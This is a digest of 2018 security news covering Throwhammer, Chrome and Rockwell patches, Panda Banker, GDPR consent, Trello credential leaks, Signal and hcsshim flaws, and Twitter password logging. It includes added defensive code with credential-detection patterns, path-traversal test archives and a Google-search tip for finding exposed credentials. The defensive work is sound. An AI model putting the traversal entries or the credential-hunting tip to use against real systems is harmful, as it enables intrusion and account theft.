Now security experts have devised a new attack technique, dubbed Throwhammer, that launches a Rowhammer attack on a system just by sending specially crafted packets to a vulnerable network card over the local area network.

Rowhammer is a problem affecting some recent DRAM devices in which repeatedly accessing a row of memory can cause bit flips in adjacent rows; in principle, this lets an attacker flip bits in memory they are not allowed to write.

The issue has been known at least since 2012; the first practical attack was demonstrated in 2015 by researchers at Google's Project Zero.

In October 2016, a team of researchers in the VUSec Lab at Vrije Universiteit Amsterdam devised a new Rowhammer-based attack, dubbed DRAMMER, that could be exploited to gain ‘root’ access to millions of Android smartphones and take control of affected devices.

The new technique was devised by the same team of researchers behind the previous ones, a group of experts from Vrije Universiteit Amsterdam and the University of Cyprus.

This time the researchers demonstrated that, by sending crafted packets over the LAN, it is possible to mount a Rowhammer attack on systems whose Ethernet network cards support Remote Direct Memory Access (RDMA), a configuration widely adopted in cloud infrastructure and data centers.


RDMA lets network cards read from and write to a peer's main memory directly, bypassing the CPU. The researchers showed that this feature can be abused to access target memory in rapid succession and trigger bit flips in the DRAM.

The researchers explained that the Throwhammer attack requires a high-speed network of at least 10Gbps, enough to perform the hundreds of thousands of accesses to specific DRAM locations within tens of milliseconds that are needed to trigger a bit flip.

“Specifically, we managed to flip bits remotely using a commodity 10 Gbps network. We rely on the commonly-deployed RDMA technology in clouds and data centers for reading from remote DMA buffers quickly to cause Rowhammer corruptions outside these untrusted buffers.” reads the research paper published by the experts.

“These corruptions allow us to compromise a remote memcached server without relying on any software bug”

According to the paper, the experts observed bit flips after accessing memory 560,000 times in 64 ms (roughly 9 million accesses per second) over the LAN through the RDMA-enabled network card.

“Even regular 10 Gbps Ethernet cards can easily send 9 million packets per second to a remote host that end up being stored on the host’s memory.” continues the paper.

“Might this be enough for an attacker to effect a Rowhammer attack from across the network? In the remainder of this paper, we demonstrate that this is the case and attackers can use these bit flips induced by network traffic to compromise a remote server application.”

Remember that Rowhammer exploits a weakness in the hardware itself, so it cannot be fully fixed with a software patch.

The experts explained that disabling RDMA would stop the attack but is not realistic in these environments; they therefore presented defenses such as ALIS, a custom allocator that isolates RDMA buffers in physical memory so that the bit flips they induce cannot reach other data.

Technical details for the Throwhammer attack are available in the paper published by the experts and titled “Throwhammer: Rowhammer Attacks over the Network and Defenses.”


Chrome 66 Update Patches Critical Security Flaw
11.5.2018 securityweek
Vulnerability

An updated version of Chrome 66 is now available, which addresses a Critical security vulnerability that could allow an attacker to take over a system.

A total of 4 security vulnerabilities were addressed in the latest browser release, three of which were reported by external researchers.

The most important of the vulnerabilities are two High severity flaws that chain together to result in a sandbox escape. The issues include CVE-2018-6121, a privilege escalation in extensions, and CVE-2018-6122, a type confusion in V8.

The vulnerability chain was reported by an anonymous researcher on April 23. Google hasn’t published information on the flaw, but it appears that a remote attacker could exploit it to take control of vulnerable systems.

Another vulnerability resolved in the new browser iteration is CVE-2018-6120, a heap buffer overflow in PDFium reported by Zhou Aiting of Qihoo 360 Vulcan Team. The security researcher received a $5,000 reward for the finding.

The updated browser is available for download as version 66.0.3359.170 for Windows, Mac, and Linux devices.

This is the second time Google patches a Critical bug in Chrome 66 since the browser’s release in the stable channel less than a month ago.

In late April, the Internet giant addressed a use-after-free in Media Cache that could be exploited by a malicious actor to cause a denial of service and possibly execute arbitrary code. The bug was reported by security researcher Ned Williamson, who received a $10,500 reward for the discovery.

The first stable release of Chrome 66 arrived with fixes for 62 security vulnerabilities, including two use-after-free bugs in Disk Cache rated Critical severity (CVE-2018-6085 and CVE-2018-6086). Both issues were reported by Ned Williamson.


Panda Banker Campaign Hits U.S. Banks
11.5.2018 securityweek
Virus

Recently detected campaigns using the Panda Banker malware are targeting financial institutions worldwide, with those in the United States taking the largest hit, F5 reports.

First seen in 2016, Panda is based on the leaked source code of the infamous Zeus banking Trojan and has been involved in multiple infection campaigns globally. Sold as a kit on underground forums, the malware uses man-in-the-browser and webinjects to steal user credentials.

Historically, the threat has been targeting financial institutions in Italy, Canada, Australia, Germany, the United States, and the United Kingdom, but also started focusing on Japan earlier this year.

Now, F5 reports that, while Japan continues to be hit, the malware is also targeting users in the United States, Canada, and Latin America.

In February, the malware was targeting financial services and cryptocurrency sites in Italy with screenshots rather than webinjects, likely “to document and spy on user interaction at cryptocurrency accounts.”

In May, three different Panda Banker campaigns were observed, each focused on another geography.

One of them, F5 reports, hit 8 industries in North America, with 78% of the targets being US financial organizations. Canadian financial organizations, cryptocurrency sites, global social media providers, search and email providers, payroll, entertainment, and tech providers were also targeted.

“This campaign is also targeting major social media platforms like Facebook and Instagram, as well as messaging apps like Skype, and entertainment platforms like Youtube. Additionally, Panda is targeting Microsoft.com, bing.com, and msn.com,” F5 reports.

The same Panda botnet, marked as 2.6.8, is targeting Japanese financials as well. For those targets, however, the malware strips the Content Security Policy (CSP) headers from responses; CSP is a browser security mechanism that restricts which scripts a page may load and thus blocks many cross-site scripting (XSS), clickjacking and injection attacks, so removing the headers lets the webinjects execute on an otherwise trusted site.

This campaign also targets Amazon, YouTube, Microsoft.com, Live.com, Yahoo.com, and Google.com (likely targeting email accounts), along with Facebook and Twitter, and a couple of adult sites.

A third parallel campaign is hitting Latin America, focused on banks in Argentina, Colombia, and Ecuador, and the same social media, search, email, entertainment, and tech providers as the other attacks.

“This act of simultaneous campaigns targeting several regions around the world and industries indicates these are highly active threat actors, and we expect their efforts to continue with multiple new campaigns coming out as their current efforts are discovered and taken down,” F5 concludes.


UK Regulator Issues Advice on 'Consent' Within GDPR
11.5.2018 securityweek Privacy

The UK's Information Commissioners Office (ICO -- the data protection regulator) has published detailed guidance (PDF) on 'consent' within the General Data Protection Regulation. Since the UK is still in the European Union, the document provides a reasonable analysis of what is one of the trickiest aspects of GDPR. Once the UK leaves the EU, GDPR within the UK will be replaced by the new Data Protection Bill, which is designed to ensure the UK's data protection adequacy. It is not guaranteed to succeed in this.

Consent is not the only legal basis for processing personal data under GDPR. Others are a contractual relationship; compliance with a separate legal obligation; a public task; vital interest (as in, to save a life); and legitimate interests. Some of these are nuanced and may require detailed legal advice before being relied upon -- 'legitimate interests' does not mean that any commercial enterprise can ignore consent in the pursuit of profit.

Nevertheless, user consent is likely to be the primary legal justification for processing user data. Under GDPR, it is not very different to the existing requirement for consent under the European Data Protection Directive (DPD), but adds a few significant aspects. In particular, it requires that consent must be 'unambiguous' and involve 'a clear affirmative action'.

The GDPR expansion of consent comes not in the definition but in the use and implications of consent. Three key areas are the need for keeping records of consent; the user's right to withdraw consent; and the inability to make consent a condition of a contract. "In essence," says the ICO, "there is a greater emphasis in the GDPR on individuals having clear distinct ('granular') choices upfront and ongoing control over their consent."

Genuine and lawful consent becomes a double-edged sword. On the one hand, it gives the user greater control over the use of his or her data (for example, the 'right to be forgotten' and the right to data portability); while on the other hand, the ICO says that explicit consent "can legitimize automated decision-making, including profiling."

However, it is the way the additional consent requirements play upon the definition of consent that can introduce confusion. An obvious example -- which has always existed but is now brought into focus by the potential size of the new GDPR fines -- involves 'freely given'. Consent cannot be freely given if there is imbalance in the relationship between the individual and the controller. "This will make consent particularly difficult for public authorities and for employers, who should look for an alternative lawful basis where possible," warns the ICO.

In general, public authorities should rely on the 'public task' justification rather than the consent justification. Employers who wish to process information on staff must be wary of any implication that continued employment might depend upon their consent to the processing -- that consent cannot be freely given and any reliance by the employer on that consent would be illegal.

The right to be forgotten is another complication. The implication of the regulation is that if, for any reason, the user cannot withdraw consent, or the data cannot be deleted, then consent was never legally given. Under such circumstances, user consent is most likely the wrong justification. The ICO uses a credit card company as an example. The company might ask for the user's consent to send details to a credit reference agency.

"However," says the ICO, "if a customer refuses or withdraws their consent, the credit card company will still send the data to the credit reference agencies on the basis of 'legitimate interests'. So, asking for consent is misleading and inappropriate -- there is no real choice." In this instance, the 'legitimate interests' justification should have been used from the outset -- not user consent.

The inability to use consent as a contract condition is another nuanced area that could lead to confusion. "If you require someone to agree to processing as a condition of service," says the ICO, "consent is unlikely to be the most appropriate lawful basis for the processing. In some circumstances it won't even count as valid consent."

The example given concerns a cafe that decides to offer its customers free wifi if they provide their name, email address and mobile phone number and then agree to the cafe's terms and conditions. The T&Cs make it clear that the details will be used for direct marketing. "The cafe is therefore making consent to send direct marketing a condition of accessing the service. However, collecting their customer's details for direct marketing purposes is not necessary for the provision of the wifi. This is not therefore valid consent."

If the consent issue sounds complex and confusing, it is because it is complex and confusing. For example, probably every reader will have received emails from companies seeking to gain 're-consent' to continue sending marketing or other emails before GDPR comes into effect. One example received here simply says, "To comply with the new EU General Data Protection Regulation (GDPR), we need to confirm that you want to keep receiving our marketing emails. Please confirm your subscription to [our firm's] marketing communications by clicking the button below." (Incidentally, beware of similar but false phishing emails.)

The reality is that such emails are either unnecessary or illegal. If the original consent was properly acquired in the first case, it will almost certainly remain valid. If consent was either not or inappropriately gathered in the first place, then this email is inadequate for GDPR's requirements. At just one very simple and basic level, it doesn't inform the reader of the right to withdraw consent; and is consequently not valid consent.

A case in point is the £13,000 fine levied by the ICO on Honda Motor Europe Ltd. The ICO announced in March 2017, "A separate ICO investigation into Honda Motor Europe Ltd revealed the car company had sent 289,790 emails aiming to clarify certain customers' choices for receiving marketing."

Honda believed it was doing so to abide by GDPR -- but in fact it was breaching the consent requirements of a separate law (the Privacy and Electronic Communication Regulations -- PECR), "The firm believed the emails were not classed as marketing but instead were customer service emails to help the company comply with data protection law. Honda couldn't provide evidence that the customers had ever given consent to receive this type of email, which is a breach of PECR. The ICO fined it £13,000."

At around the same time, the ICO fined the British Flybe airline £70,000 for sending more than 3.3 million emails to people who had told them they didn't want to receive marketing emails from the firm. Steve Eckersley, ICO Head of Enforcement, said at the time, "Both companies sent emails asking for consent to future marketing. In doing so they broke the law. Sending emails to determine whether people want to receive marketing without the right consent, is still marketing and it is against the law."

These fines, had they been levied under GDPR after 25 May 2018, could have been considerably higher.

The document published by the ICO is long and complex, but full of links for further information and examples of valid and invalid use of user consent. Getting consent wrong could be costly -- but getting it right is beneficial. "The GDPR sets a high standard for consent. Consent means offering people genuine choice and control over how you use their data," says the ICO. "When consent is used properly, it helps you build trust and enhance your reputation."


Rockwell Automation Patches Flaws in Simulation, Licensing Tools
11.5.2018 securityweek Vulnerability

Rockwell Automation has released updates for its Arena and FactoryTalk Activation Manager products to address various types of vulnerabilities, including a critical flaw that can allow remote code execution.

Both ICS-CERT and Rockwell Automation have released advisories describing the security holes and mitigations, but the vendor's advisories are only available to registered users.

FactoryTalk Activation Manager, a tool designed for managing licensed content and activating Rockwell software products, uses the Wibu-Systems CodeMeter and FlexNet Publisher license management applications.

Wibu-Systems CodeMeter is affected by a cross-site scripting (XSS) vulnerability that can be exploited to inject arbitrary code via a field in a configuration file, allowing attackers to access sensitive information or alter the impacted HTML page. The issue is tracked as CVE-2017-13754 and is considered low severity.

FlexNet Publisher, on the other hand, is affected by a critical buffer overflow (CVE-2015-8277) that can allow a remote attacker to execute arbitrary code.

"A custom string copying function of Imgrd.exe (the license server manager in FlexNet Publisher) and flexsvr.exe does not use proper bounds checking on incoming data, potentially allowing a remote, unauthenticated user to send crafted messages with the intent of causing a buffer overflow," Rockwell said in its advisory.

The vulnerabilities affect FactoryTalk Activation Manager 4.00.02 and 4.01, which bundle Wibu-Systems CodeMeter v6.50b and earlier, and FactoryTalk Activation Manager 4.00.02 and earlier, which bundle FlexNet Publisher v11.11.1.1 and earlier.

FactoryTalk Activation Manager is used by more than two dozen Rockwell products; users can consult the list provided by the vendor and ICS-CERT to see if they are affected. Updating Activation Manager to version 4.02 patches the vulnerabilities. Alternatively, CodeMeter can be updated to a compatible version.

Separate advisories published recently by Rockwell and ICS-CERT describe a medium severity denial-of-service (DoS) vulnerability affecting Arena, a simulation software for the manufacturing sector. Arena is designed to help organizations identify process bottlenecks, evaluate process changes, improve logistics, and increase throughput.

Researcher Ariele Caltabiano informed Rockwell through Trend Micro’s Zero Day Initiative (ZDI) that Arena is affected by a use-after-free vulnerability that can be exploited to crash the software by convincing the targeted user to open a specially crafted file. Crashing the application could lead to the user losing unsaved data.

Rockwell says the flaw, tracked as CVE-2018-8843, affects Arena Simulation Software for Manufacturing versions 15.10.00 and earlier, and it has been patched with the release of version 15.10.01.


Mining passwords from dozens of public Trello boards
11.5.2018 securityaffairs Hacking

Trello: how a misunderstanding of board visibility put the private data of a huge community of unaware users at risk.
A “security enthusiast” found that a simple Google dork is enough to mine passwords from dozens of public Trello boards.


Our story begins with the @Trello Twitter account, where we read:

“Trusted by millions, Trello is the visual collaboration tool that creates a shared perspective on any project.” Yes, “trusted by millions”: but those millions probably did not understand what “Public” means for a Trello board, and used boards as private space when they were anything but.

So now, even while trusting Trello, millions of users risk having their personal data exposed, including credentials, private information and confidential details of their projects. As we write, that sensitive data is exposed on the Internet to anyone who runs a simple Google dork.

The discovery is the work of Kushagra Pathak, who describes himself as a cyber-security enthusiast on his Twitter profile @xKushagra and has written up this remarkable research in a truly amazing blog post.

A few days ago, as he tells it, he was looking for Jira instances for a bug bounty program with a simple dork:

[image: the Google dork]

By putting “trello.com” in the [company_name] placeholder, he made an amazing discovery: the Google query returned Trello boards on which every kind of information was published.

Taking a closer look at the results, he “found that a lot of individuals and companies are putting their sensitive information on their public Trello Boards.” Yes, it is amazing, but it happened. What kind of information had they put on their Trello boards? “Information like unfixed bugs and security vulnerabilities, the credentials of their social media accounts, email accounts, server and admin dashboards”, all of it indexed by the search engines, so anyone can easily find it. He tweeted this:
Kushagra Pathak (@xKushagra), 11:30 AM - Apr 25, 2018:
“#bugbountytip #osint: Search for public Trello boards of companies, to find login credentials, API keys, etc. or if you aren't lucky enough, then you may find companies' Team Boards sometimes with tasks to fix security vulnerabilities”

Digging into the details, he “went on to modify the search query to focus on Trello Boards containing the passwords for Gmail accounts.”

The result of that simple dork was really incredible: Google returned many passwords in clear text, as shown in the figure in his post.

So Trello boards have been the subject of a huge misunderstanding: they were “Public” boards, not private ones, but their users did not know it, or did not consider it.

Some users even used public Trello boards “as a fancy public password manager for their organization’s credentials.”, as Kushagra Pathak writes.

Every kind of search then becomes possible: by email provider (AOL, Yahoo, Mail.com), by protocol (SSH, FTP), and on to business emails, social media accounts, website analytics, Stripe and AdWords accounts.
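The kinds of leak listed above are easy to audit for on boards you own. As an added example (not part of Kushagra Pathak's post and not Trello's tooling), the Python below scans a board export for credential-shaped content. It assumes the export is a JSON object with a `cards` list whose entries carry `name` and `desc`, as a Trello board's JSON export does; the board data embedded here is constructed and contains no real accounts, keys or passwords.

```python
"""Scan an exported Trello board for credential-like content.

Added example. The board shape (top-level "cards", each with "name" and
"desc") is an assumption about Trello's JSON export; adapt if yours differs.
"""
import json
import re

# Constructed sample: the "public password manager" pattern the post describes.
# Nothing here is a real account, key or password.
SAMPLE_BOARD_JSON = json.dumps({
    "name": "Ops team",
    "cards": [
        {"name": "Gmail for support",
         "desc": "support@example.com\npassword: Hunter2!"},
        {"name": "Staging box",
         "desc": "ssh deploy@staging.example.com pw: Summer2018"},
        {"name": "Stripe",
         "desc": "sk_test_XXXXXXXXXXXXXXXXXXXXXXXX (rotate before go-live)"},
        {"name": "Sprint retro",
         "desc": "Discuss velocity and the flaky CI job."},
        {"name": "FTP archive",
         "desc": "ftp://backup:s3cret@files.example.com/"},
    ],
})

# One pattern per category the post lists. Deliberately conservative; extend
# with the key formats your own organisation uses.
PATTERNS = {
    "password_field": re.compile(r"\b(?:password|passwd|pwd|pw)\s*[:=]\s*(\S+)", re.I),
    "url_with_creds": re.compile(r"\b(?:ssh|ftp|sftp|https?)://[^\s/:@]+:[^\s/@]+@\S+", re.I),
    "stripe_key": re.compile(r"\bsk_(?:live|test)_[A-Za-z0-9]{16,}\b"),
    "email": re.compile(r"\b[\w.+-]+@[\w-]+\.[\w.-]+\b"),
}


def scan_card(card):
    """Return (category, matched text) tuples for one card's title and body."""
    text = f"{card.get('name', '')}\n{card.get('desc', '')}"
    hits = []
    for category, pattern in PATTERNS.items():
        for m in pattern.finditer(text):
            hits.append((category, m.group(0)))
    return hits


def scan_board(board_json):
    """Return {card name: [(category, match), ...]} for cards that leak something.

    An email address on its own is context, not a leak; a card is reported only
    if it also carries a password field, a URL with embedded credentials, or a key.
    """
    board = json.loads(board_json)
    findings = {}
    for card in board.get("cards", []):
        hits = scan_card(card)
        if any(category != "email" for category, _ in hits):
            findings[card["name"]] = hits
    return findings


if __name__ == "__main__":
    for name, hits in scan_board(SAMPLE_BOARD_JSON).items():
        print(name)
        for category, match in hits:
            print(f"  {category}: {match}")
```

Treat every hit as a credential to rotate, not merely to delete from the card: once a public board has been indexed, a search engine's cache may keep the old text long after the card is edited.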

At this point, I contributed to spreading the news around the world.

Odisseus (@_odisseus), 9:18 AM - May 11, 2018:
“#Trello is an online tool for managing projects and personal tasks and with a dork is possible to exfiltrate business emails, Jira credentials, and sensitive internal information of Bug Bounty Programs.
Via @xKushagra https://medium.freecodecamp.org/discovering-the-hidden-mine-of-credentials-and-sensitive-information-8e5ccfef2724 …”

Kushagra Pathak also found that almost 25 companies were leaking very sensitive information and, as a proven ethical hacker, quickly reported the exposure to each of them, a tedious and challenging task.

The only ironic side of this story is that finding the right person or the right contact email was easy: they were all on the Trello boards.

There is a less ironic side: what about the bug bounty? Our hero found, among the exposed companies, one running a bug bounty program, but he was not rewarded at all: “Unfortunately, they didn’t reward me because it was an issue for which they currently don’t pay”, he said.


Self-destructing messages received on 'Signal for Mac' can be recovered later
11.5.2018 thehackernews Apple

It turns out that the macOS client for the popular end-to-end encrypted messaging app Signal fails to properly delete disappearing (self-destructing) messages from the recipient's system, leaving the content of your sensitive messages at risk of exposure.
For those unaware, disappearing messages in Signal self-destruct after a duration set by the sender, leaving no trace on the receiver's device or on Signal's servers.
However, security researcher Alec Muffett noticed that messages that are supposed to "disappear" can still be seen, even after they have been deleted from the app.
Another security researcher, Patrick Wardle, reproduced the issue and explained that macOS keeps a copy (partial, for long messages) of disappearing messages in a user-readable database belonging to macOS's Notification Center, from which they can be recovered at any later time.
If you want to keep an eye on your incoming messages without checking your inbox obsessively, macOS desktop notifications (banners and alerts) that appear in the upper-right corner of your screen are a great way to be alerted to things you don't want to miss.

According to a blog post published by Wardle, if you have enabled notifications for Signal app, the service will show you notifications for the disappearing messages as well in the form of truncated messages (which is generally 1-1.5 lines of the full message).
Now, sharing incoming disappearing messages with the notification system leads to two privacy issues:
First, "disappearing" messages may remain in the macOS Notification Center UI even after being deleted within the Signal app, and can be seen in the notification bar until the user manually dismisses them.
Second, in the backend, the SQLite database of Notification Center also keeps a copy of the truncated messages, which can be read with normal user permissions, or by a malicious app installed on the system.
Wardle suggests that Signal should either not post notifications for disappearing messages at all, or should explicitly delete such notifications from the system's database when it removes the messages from the app UI.
Meanwhile, to protect the content of your sensitive messages so that no malicious app, hacker, or anyone with access to your Mac can recover them, consider disabling notifications for Signal until this issue is patched.
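The failure mode Wardle describes comes down to one piece of data in two stores with different owners: the app deletes from its own database but not from the system's. The Python below models that with two in-memory SQLite tables and shows the remedy he suggests. It is an added illustration, not Signal's or Apple's code; the notification table (app id, body) is a constructed stand-in and does not reproduce the real Notification Center schema, and the bundle identifier is assumed.

```python
"""Model of a disappearing message outliving its deletion because a copy
was handed to a store the app does not clean up.

Added illustration, not Signal's or macOS's code. The notification table is
a constructed stand-in for the real Notification Center database.
"""
import sqlite3

APP_ID = "org.whispersystems.signal-desktop"   # assumed identifier, used only as a label
PREVIEW_CHARS = 80                              # stand-in for the truncated notification preview


def open_stores():
    """Two databases: the app's own messages and the system's notifications."""
    app_db = sqlite3.connect(":memory:")
    app_db.execute("CREATE TABLE messages (id INTEGER PRIMARY KEY, body TEXT, expires_at INTEGER)")
    notif_db = sqlite3.connect(":memory:")
    notif_db.execute("CREATE TABLE notifications (id INTEGER PRIMARY KEY, app_id TEXT, body TEXT)")
    return app_db, notif_db


def receive_message(app_db, notif_db, body, expires_at, notify=True):
    """Store a disappearing message; with notifications on, a truncated copy
    leaves the app's control and lands in the system store."""
    cur = app_db.execute("INSERT INTO messages (body, expires_at) VALUES (?, ?)", (body, expires_at))
    if notify:
        notif_db.execute("INSERT INTO notifications (app_id, body) VALUES (?, ?)",
                         (APP_ID, body[:PREVIEW_CHARS]))
    return cur.lastrowid


def expire_messages_naive(app_db, now):
    """The reported behaviour: expiry touches only the app's own table."""
    app_db.execute("DELETE FROM messages WHERE expires_at <= ?", (now,))


def expire_messages_fixed(app_db, notif_db, now):
    """Wardle's second suggestion: purge the notification copies as well."""
    rows = app_db.execute("SELECT body FROM messages WHERE expires_at <= ?", (now,)).fetchall()
    for (body,) in rows:
        notif_db.execute("DELETE FROM notifications WHERE app_id = ? AND body = ?",
                         (APP_ID, body[:PREVIEW_CHARS]))
    app_db.execute("DELETE FROM messages WHERE expires_at <= ?", (now,))


def leftover_previews(notif_db):
    """What any process running as the user can still read afterwards."""
    return [row[0] for row in notif_db.execute(
        "SELECT body FROM notifications WHERE app_id = ?", (APP_ID,))]


def demo(fixed):
    """Return (messages still in the app, previews still in the system store)."""
    app_db, notif_db = open_stores()
    receive_message(app_db, notif_db, "meet at the usual place, code 4471", expires_at=100)
    if fixed:
        expire_messages_fixed(app_db, notif_db, now=200)
    else:
        expire_messages_naive(app_db, now=200)
    remaining = app_db.execute("SELECT COUNT(*) FROM messages").fetchone()[0]
    return remaining, leftover_previews(notif_db)


if __name__ == "__main__":
    print("naive:", demo(fixed=False))   # message gone from the app, preview still readable
    print("fixed:", demo(fixed=True))
```

The general lesson is the one Wardle draws: any copy that leaves the app's own storage (notifications, spotlight indexes, clipboard, crash logs) needs its own deletion path, keyed on the same identifier the app uses when it expires the original.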


Microsoft Issues Emergency Patch For Critical Flaw In Windows Containers
11.5.2018 thehackernews Vulnerability

Just a few days prior to its monthly patch release, Microsoft released an emergency patch for a critical vulnerability in the Windows Host Compute Service Shim (hcsshim) library that could allow remote attackers to run malicious code on Windows computers.
Windows Host Compute Service Shim (hcsshim) is an open source library that helps "Docker for Windows" execute Windows Server containers using a low-level container management API in Hyper-V.
Discovered by Swiss developer and security researcher Michael Hanselmann, the critical vulnerability (tracked as CVE-2018-8115) is the result of the failure of the hcsshim library to properly validate input when importing a Docker container image.
This, in turn, allows an attacker to remotely execute arbitrary code on the Windows host operating system, eventually letting the attacker create, remove, and replace files on the target host.
As Hanselmann explained in his personal blog, "Importing a Docker container image or pulling one from a remote registry isn't commonly expected to make modifications to the host file system outside of the Docker-internal data structures."
Hanselmann reported the issue to Microsoft in February this year, and the tech giant fixed the vulnerability a few days before this month’s patch Tuesday by releasing an updated version of hcsshim.
Although the vulnerability has been assigned a critical severity rating, Microsoft says exploitation of this issue is unlikely.
"To exploit the vulnerability, an attacker would place malicious code in a specially crafted container image which, if an authenticated administrator imported (pulled), could cause a container management service utilizing the Host Compute Service Shim library to execute malicious code on the Windows host," Microsoft says in its advisory.
The patch for this vulnerability addresses the way hcsshim validates input from Docker container images, therefore blocking the loading of malicious code in specially crafted files.
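The article describes the flaw only as missing input validation during image import that lets a crafted image create, remove and replace files on the host. The Python below is an added example of the standard check for that class of problem, not hcsshim's code: it assumes a layer arrives as a tar archive and refuses any member whose name or link target would resolve outside the layer directory. The archives it inspects are constructed in memory.

```python
"""Validate archive member paths before a layer is written to the host.

Added example of the generic hardening for unvalidated import paths; not
hcsshim's code, and the assumption that the relevant input is a tar layer
is ours. Nothing is extracted here, so it runs safely anywhere.
"""
import io
import posixpath
import tarfile


class UnsafeEntry(ValueError):
    """An archive member that would land outside the destination directory."""


def _inside(path, dest):
    return path == dest or path.startswith(dest.rstrip("/") + "/")


def check_member(member, dest):
    """Return the normalised on-host path for `member`, or raise UnsafeEntry.

    Rejects absolute names (POSIX or drive-letter), ".." traversal, and
    symlinks or hard links whose target lands outside `dest`.
    """
    name = member.name.replace("\\", "/")
    if name.startswith("/") or (len(name) > 1 and name[1] == ":"):
        raise UnsafeEntry(f"absolute path: {member.name}")
    target = posixpath.normpath(posixpath.join(dest, name))
    if not _inside(target, dest):
        raise UnsafeEntry(f"path traversal: {member.name}")
    if member.issym() or member.islnk():
        link = member.linkname.replace("\\", "/")
        if link.startswith("/") or (len(link) > 1 and link[1] == ":"):
            raise UnsafeEntry(f"absolute link target: {member.name} -> {member.linkname}")
        # a symlink resolves relative to its own directory, a hard link to the archive root
        base = posixpath.dirname(target) if member.issym() else dest
        if not _inside(posixpath.normpath(posixpath.join(base, link)), dest):
            raise UnsafeEntry(f"link escapes destination: {member.name} -> {member.linkname}")
    return target


def validate_layer(tar_bytes, dest):
    """Check every member before anything is written; return their on-host paths.

    Only after this returns should extraction run (e.g. TarFile.extractall with
    exactly the validated member list), so a bad entry late in the archive
    cannot follow good ones onto disk.
    """
    dest = posixpath.normpath(dest)
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:*") as archive:
        return [check_member(m, dest) for m in archive.getmembers()]


def is_safe_layer(tar_bytes, dest):
    try:
        validate_layer(tar_bytes, dest)
    except UnsafeEntry:
        return False
    return True


def build_layer(entries):
    """Constructed sample archive. entries: (name, data) or (name, None, linkname)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as archive:
        for entry in entries:
            info = tarfile.TarInfo(entry[0])
            if len(entry) == 3:
                info.type = tarfile.SYMTYPE
                info.linkname = entry[2]
                archive.addfile(info)
            else:
                info.size = len(entry[1])
                archive.addfile(info, io.BytesIO(entry[1]))
    return buf.getvalue()


# Constructed layers: one benign, two crafted to escape the layer directory.
BENIGN_LAYER = build_layer([("etc/app.conf", b"listen=8080\n"), ("bin/sh", None, "busybox")])
CRAFTED_LAYER = build_layer([("etc/app.conf", b"listen=8080\n"),
                             ("../../../Windows/System32/evil.dll", b"MZ...")])
LINK_LAYER = build_layer([("etc/hosts", None, "../../../../etc/hosts")])

if __name__ == "__main__":
    for label, layer in [("benign", BENIGN_LAYER), ("crafted", CRAFTED_LAYER), ("link", LINK_LAYER)]:
        print(label, "safe" if is_safe_layer(layer, "/var/lib/layers/abc") else "REJECTED")
```

Whole-archive validation before any write is the important part: validating member by member while extracting still lets the entries before the bad one land on disk, and a symlink created early can redirect a later, innocent-looking relative path.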
An updated version 0.6.10 of the Windows Host Compute Service Shim (hcsshim) file is available right now for download from GitHub.
Full details of the vulnerability have not been released yet, but Hanselmann promises to publish in-depth technical details and a proof-of-concept exploit for the flaw on May 9, following an agreement with Microsoft security response center.
Microsoft's May 2018 Patch Tuesday has been scheduled for release on May 8.


Change Your Twitter Password Immediately, Bug Exposes Passwords in Plaintext
11.5.2018 thehackernews Social

Twitter is urging all of its 330 million users to change their passwords after a software glitch unintentionally exposed its users' passwords by storing them in readable text on its internal computer system.
The social media network disclosed the issue in an official blog post and a series of tweets from Twitter Support.


According to Twitter CTO Parag Agrawal, Twitter hashes passwords with bcrypt, a function that combines the password with a random salt and produces a fixed-length hash, and stores only that hash in its systems.
This allows the company to validate users' credentials without holding their actual passwords, which not even Twitter employees can see.

However, a software bug resulted in passwords being written to an internal log before completing the hashing process—meaning that the passwords were left exposed on the company's internal system.
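The bug Twitter describes is an ordering problem: the secret was written to a log before the hashing step ran. The Python below is an added example, not Twitter's code, showing the buggy order beside the fixed one, plus a logging filter that redacts credential fields as a backstop for the next refactor. PBKDF2 from the standard library stands in for bcrypt so the snippet runs without third-party packages (same structure: random salt, slow hash, verify by recomputing); the form fields and the list of sensitive key names are assumptions.

```python
"""Keep plaintext passwords out of logs: hash at the boundary, and redact
anything credential-shaped that still reaches a log record.

Added example, not Twitter's code. PBKDF2-HMAC-SHA256 stands in for bcrypt.
"""
import hashlib
import hmac
import io
import logging
import os
import re

SENSITIVE_KEYS = ("password", "passwd", "new_password", "token")   # assumed field names
ROUNDS = 200_000


def hash_password(password, salt=None):
    """Return 'salt$digest' for storage; the input is never kept."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ROUNDS)
    return f"{salt.hex()}${digest.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    salt_hex, digest_hex = stored.split("$", 1)
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), ROUNDS)
    return hmac.compare_digest(candidate.hex(), digest_hex)


class RedactCredentials(logging.Filter):
    """Scrub credential fields from every record, whether they arrive as a
    dict repr, JSON, or a query string. A backstop, not a substitute for
    hashing first."""
    _pattern = re.compile(
        r"(\b(?:" + "|".join(SENSITIVE_KEYS) + r")\b['\"]?\s*[:=]\s*)"
        r"(?:'[^']*'|\"[^\"]*\"|[^\s,}&]+)", re.I)

    def filter(self, record):
        record.msg = self._pattern.sub(r"\1[REDACTED]", record.getMessage())
        record.args = ()
        return True


def make_logger(name, redact):
    """Logger writing to an in-memory buffer so the demo can inspect its output."""
    stream = io.StringIO()
    logger = logging.getLogger(name)
    logger.handlers.clear()
    logger.filters.clear()
    logger.setLevel(logging.INFO)
    logger.propagate = False
    logger.addHandler(logging.StreamHandler(stream))
    if redact:
        logger.addFilter(RedactCredentials())
    return logger, stream


def signup_buggy(form, logger):
    """The ordering Twitter described: the request is logged before hashing."""
    logger.info("signup request: %s", form)
    return hash_password(form["password"])


def signup_fixed(form, logger):
    """Hash at the boundary; the secret is gone before anything is logged."""
    stored = hash_password(form.pop("password"))
    logger.info("signup request: %s", form)
    return stored


if __name__ == "__main__":
    form = {"user": "alice", "password": "correct horse"}
    for label, handler, redact in [("buggy", signup_buggy, False),
                                   ("buggy+filter", signup_buggy, True),
                                   ("fixed", signup_fixed, False)]:
        logger, stream = make_logger(label, redact)
        handler(dict(form), logger)
        print(f"{label:13s} -> {stream.getvalue().strip()}")
```

Run it and the first line contains the password verbatim, the other two do not. Putting the hashing call first is the fix; the filter is there because request-logging middleware tends to be added later by someone who never sees the signup handler.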
